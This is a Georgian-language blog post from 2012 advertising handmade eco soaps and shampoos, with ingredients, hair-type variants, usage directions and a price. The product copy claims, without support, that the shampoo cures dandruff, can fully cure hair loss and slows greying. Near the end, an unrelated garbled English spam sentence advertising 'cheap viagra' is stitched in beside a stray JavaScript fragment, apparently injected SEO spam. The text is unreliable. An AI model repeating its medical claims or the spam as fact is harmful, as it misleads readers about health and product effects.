Jun 17, 2012
admin
Comments Off on ECO ხელით ნაკეთი საპონი და შამპუნი

ECO ხელით ნაკეთი საპონი და შამპუნი

ეკო საპონი

ეკო საპონი

 

სახის, თმის და სხეული მოვლისთვის, 100%-ით ნატურალური ზეთებით დამზადებული ხელნაკეთი საპნები. ყველა საპნის ფასი 8,40 თეთრს შეადგენს. შეძენა შესაძლებელია “ქალთა ბედნიერების” ნებისმიერ ფილიალში.

ECO –ს შამპუნი და საპონი შექმნილია მხოლოდ ნატურალური, მაღალი ხარისხის ზეთებით ორგანული, მინერალური და აქტიური ნივთიერებებით.

პროდუქტი არ შეიცავს ქიმიურ ქაფწარმომქნელებს, ემულგატორებს, კონსერვანტებს, ქლორს, ნავთობპროდუქტებს, სინთეტიურ არომატიზატორებს, საღებავებს. შესაბამისად არ იწვევს სამრეწველო ალერგიას.

ECO –ს შამპუნის ინგრედიენტებია: დაფნის ზეთი, აბუსალათინის ზეთი, სიმინდის ზეთი, მზესუმზირის ზეთი, ორგანული კვერცხის გული, მწვანე თიხა, ჟელატინი, გლიცერინი, ლუდი, წყალი, სოდა.

შამპუნი არეგულირებს თავის კანის ცხიმიანობას, კურნავს ქერტლს, ამცირებს თმის ცვენას,  (შესაძლოა სრული განკურნებაც), აჩქარებს თმის ზრდას. ხაზს უსვამს თმის ფერის ინტენსივობას, აფერხებს თმის გათეთრების პროცესს.

თიხის შამპუნი – განკუთვნილია ცხიმიანი თმისთვის. იძლევა მოცულობით ეფექტს.

კვერცხის გულის შამპუნი– რეკომენდირებულია მშრალი, დაზიანებული თმისთვის. განსაკუთრებით არბილებს თმას.

ლუდის შამპუნი– განკუთვნილია ნორმალური ტიპის თმისთვის. იძლევა მოცულობით ეფექტს და ვარცხნილობას უნარჩუნებს ფორმას.

მოხმარების წესი

ECO –ს შამპუნი რადიკალურად განსხვავდება ჩვეული სამრეწველო შამპუნებისგან. შესაძლოა თმას ადაპტაციისთვის დასჭირდეს გარკვეული დრო (ორ კვირამდე) რადგან შემადგენლობაში არ შედის ქიმიური ქაფწარმომქმნელები, სუსტად ქაფდება, მაგრამ იდეალურად ადეზინფიცირებს და ასუფთავებს თავის კანსა და თმას. პატარა პორციებით შეიზილეთ კანში, დაამასაჟეთ, შემდეგ შეიზილეთ თმის ბოლოებში, გადაანაწილეთ მთელ სიგრძეზე. გაიჩერეთ ერთი–ორი წუთით და ჩამოიბანეთ უხვი წყლით. პროცედურა გაიმეორეთ 2–ჯერ.

მოკლე ხანში (2 კვირიდან –4 კვირამდე) თქვენი თმის ჯანმრთელი იერით კმაყოფილი დარჩებით.

შამპუნები კონცენტრირებულია და ეკონომიურია არ საჭიროებს დიდი რაოდენობით მოხმარებას. დაარეგულირეთ დოზა.

 

Spray but after the: with clean to cleanser cheap viagra were, this try pick you also have.

d.getElementsByTagName(‘head’)[0].appendChild(s);

Related Posts Plugin for WordPress, Blogger...

Comments are closed.

FriskStyle

VISITORS MAP

LINKwithlove